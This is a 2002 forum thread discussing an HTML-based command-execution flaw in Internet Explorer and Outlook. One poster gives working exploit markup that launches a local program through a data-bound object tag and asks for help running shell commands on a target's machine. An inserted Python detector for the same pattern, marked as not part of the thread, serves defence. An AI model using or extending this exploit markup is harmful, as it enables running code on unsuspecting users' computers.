#15195 - 03/04/02 10:43 PM
IE, Outlook and OE vulnerability
Joined: Mar 2002
Posts: 16
Nexus
Junior Member
UK
Extract from http://www.theregister.co.uk/content/4/24274.html An attacker can run arbitrary commands on Windows machines with a simple bit of HTML, an Israeli security researcher has demonstrated. The exploit will work with IE, Outlook and Outlook Express even if active scripting and ActiveX are disabled in the browser security settings. Further details at http://security.greymagic.com/adv/gm001-ie/
#15196 - 03/05/02 12:36 PM
Re: IE, Outlook and OE vulnerability
Joined: Mar 2002
Posts: 5
Kryptic Codez
Junior Member
Actually I tried the code out in the article and it didn't work.
-Kryptic Codez
"sheep mesmerized by television...the real American drug addiction..."
#15198 - 03/06/02 12:58 AM
Re: IE, Outlook and OE vulnerability
Joined: Mar 2002
Posts: 56
spectre
Junior Member
192.168.128.80
The code worked for me. I had to edit it to fix it so it worked with WINME (CALC was in C:\Windows\, not Windows\System)
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span> <xml id="oExec"> <security> <exploit> <![CDATA[ <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/CALC.exe"></object> ]]> </exploit> </security> </xml>
I then tried to create a shortcut to Windows' Command.com, but it didn't work because when u create a shortcut to command.com, it is not considered an actual shortcut, but:
Type of File: Performs text-based (command-line) functions.
I then tried to get the code to pass functions to MS-DOS. Unfortunately, for the same reason as above, you CANNOT open command.com because it is the same type of file as above.
Not knowing XML I cannot tell you how to do this, but the only work around I can think of is to know exactly what u are going to do (of course u will) and open Notepad and pass a command.com argument to it, then whatever argument to that, and save the file as perform.bat and save it then run it. All from the same XML file. If anyone knows how to do this, it would be great if I could see the code! Thanks!
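A defender-side check for the markup pattern quoted in the post above, added here as an example and not part of the original thread: it flags `<object>` tags whose `codebase` points at a local path, including tags placed inside a CDATA section and rendered through `dataformatas="html"` binding. The function names, the extension list and both sample strings are assumptions constructed for this illustration, and the regex matching is a heuristic, not a full HTML parser.

```python
import re

# Heuristic only: flags <object> tags whose codebase names a local path,
# including tags tucked inside a CDATA section of an XML data island.
OBJECT_TAG = re.compile(r"<object\b([^>]*)>", re.I)
ATTR = re.compile(r"""([\w:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
LOCAL_PATH = re.compile(r"^(?:[a-z]:[\\/]|file:|\\\\)", re.I)
EXEC_EXT = re.compile(r"\.(?:exe|com|bat|cmd|pif|scr)$", re.I)
HTML_BINDING = re.compile(r"""dataformatas\s*=\s*["']?html""", re.I)
CDATA = re.compile(r"<!\[CDATA\[(.*?)\]\]>", re.S)

# Constructed samples: the first mirrors the markup quoted in the post,
# the second is an ordinary remotely hosted control (placeholder URL).
SUSPICIOUS = """<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec"><security><exploit><![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111"
 codebase="c:/windows/CALC.exe"></object>
]]></exploit></security></xml>"""
BENIGN = ('<object classid="clsid:22222222-2222-2222-2222-222222222222" '
          'codebase="http://example.com/control.cab#version=1,0,0,0"></object>')


def parse_attrs(raw):
    """Map lower-cased attribute names to their (unquoted) values."""
    return {m.group(1).lower(): next(g for g in m.groups()[1:] if g is not None)
            for m in ATTR.finditer(raw)}


def scan(markup):
    """Return one finding per <object> whose codebase is a local path."""
    cdata_spans = [m.span(1) for m in CDATA.finditer(markup)]
    bound_as_html = bool(HTML_BINDING.search(markup))
    findings = []
    for m in OBJECT_TAG.finditer(markup):
        codebase = parse_attrs(m.group(1)).get("codebase", "").strip()
        if not LOCAL_PATH.match(codebase):
            continue  # remote (http/https) codebases are ordinary installs
        findings.append({
            "codebase": codebase,
            "executable": bool(EXEC_EXT.search(codebase.split("#")[0])),
            "in_cdata": any(s <= m.start() < e for s, e in cdata_spans),
            "html_data_binding": bound_as_html,
        })
    return findings


if __name__ == "__main__":
    for sample in (SUSPICIOUS, BENIGN):
        print(scan(sample))
```

A mail gateway or proxy filter could run `scan()` over HTML bodies and quarantine anything that returns a finding, since a legitimate control install has no reason to reference a program already on the recipient's disk.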
#15202 - 03/07/02 01:49 AM
Re: IE, Outlook and OE vulnerability
Joined: Mar 2002
Posts: 56
spectre
Junior Member
192.168.128.80
The fact of the matter is, it will not allow you to open a command prompt. The only way you could open a command prompt with this XML is to create a program that opens a command prompt, compile it, and have this link to the .EXE. Of course, the person u use this on will not have that EXE on their computer, so it doesn't matter anyway. As I said above, you cannot open command.com, command.exe, ms-dos, etc.